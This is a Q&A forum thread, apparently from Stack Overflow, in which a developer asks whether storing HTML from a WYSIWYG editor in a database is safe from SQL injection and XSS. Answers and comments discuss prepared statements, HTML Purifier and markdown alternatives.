3

I'm working on a mini blog which allows users to add a post using a WYSIWYG editor to the site therefore I will be storing this post in my DB .

Having researched markdown I have come to the conclusion that it is not fit for purpose since I require local video uploaded which is why I am now planning on storing the HTML from the WYSIWYG editor into my DB.

I however do have some concerns regarding SQL injection and XSS attacks however I have researched a solution which is HTML purifier.

If I use HTML purifier to remove unwanted HTML tags is this then a safe solution to store the HTML in my DB?

Improve this question
6
  • As long as you're safely inserting the data (ie prepared statement with parameter binding), I'd say it's probably safe enough but that's just my opinion on this subjective question Commented Jan 11, 2019 at 1:08
  • You can use a limited version of the WYSIWYG editor and also allow just a few HTML tags using strip_tags PHP function. For prevent SQL injection, you must scape the values in a proper way, or prepare statement. Commented Jan 11, 2019 at 1:09
  • I appreciate that obviously this is a subjective matter but in this situation ( Markdown not supporting local video embed) would storing HTML in the database and correctly purifying it be considered best practice ? Commented Jan 11, 2019 at 1:25
  • 2
    I wouldn't store HTML, it's just asking for trouble. How can you be sure you've filtered all potentially dangerous tags? I'd stick with storing markdown for the text content, and find another way of attaching videos. For example, invent your own markdown syntax for embedding a video, and then as your app presents the content, substitute raw html tags (in a safe way) to embed the video. Markdown allows raw html too. See forums.apricitysoftware.com/t/… Commented Jan 11, 2019 at 1:42
  • Thanks for your input. Since the WYSIWYG editor outputs HTML , If I strip tags and purify and then convert this to markdown ( adding my own custom video markdown syntax ) would this be a safer and " better practice " way of achieving what I want. Appreciate all the comments , I'm just trying to figure out how pros would handle this situation . Commented Jan 11, 2019 at 1:55

3 Answers 3

Reset to default
13

Storing HTML in the database is not intrinsically unsafe, any more than storing plain text is intrinsically unsafe. The risk of SQL injection is trivially mitigated by using prepared statements and proper placeholders. Escaping is neither necessary nor is it best practice for preventing SQL injection. Prepared statements are.

Conversely, XSS and other HTML-related vunerabilities have nothing to do with the database and everything to do with rendering HTML to viewers from untrusted sources. The same vulnerabilities would be there if the HTML were simply stored in files, with no database at all, so there is no need to protect the database from malicious HTML. The database has no knowledge of or vulnerability to what's contained in stored HTML content, because it doesn't render or interpret the HTML... again, as long as your database interactions use prepared statements. There are no acceptable justifications for avoiding those.

To exaggerate the point to an extreme, it would be perfectly safe to store files containing viruses as blobs in a database, because the database does not execute the data stored in it, as code. The vulnerability would be to the users downloading those viruses.

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

-1

You can store html in sql... but escape them first.

See the example here...

http://php.net/manual/en/function.html-entity-decode.php

Improve this answer

Comments

-1

you can save html content in mysql field as "blob", before send de html content in the back you must use something function like base64_encode in PHP for example and then, you can get that content using base64_decode

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.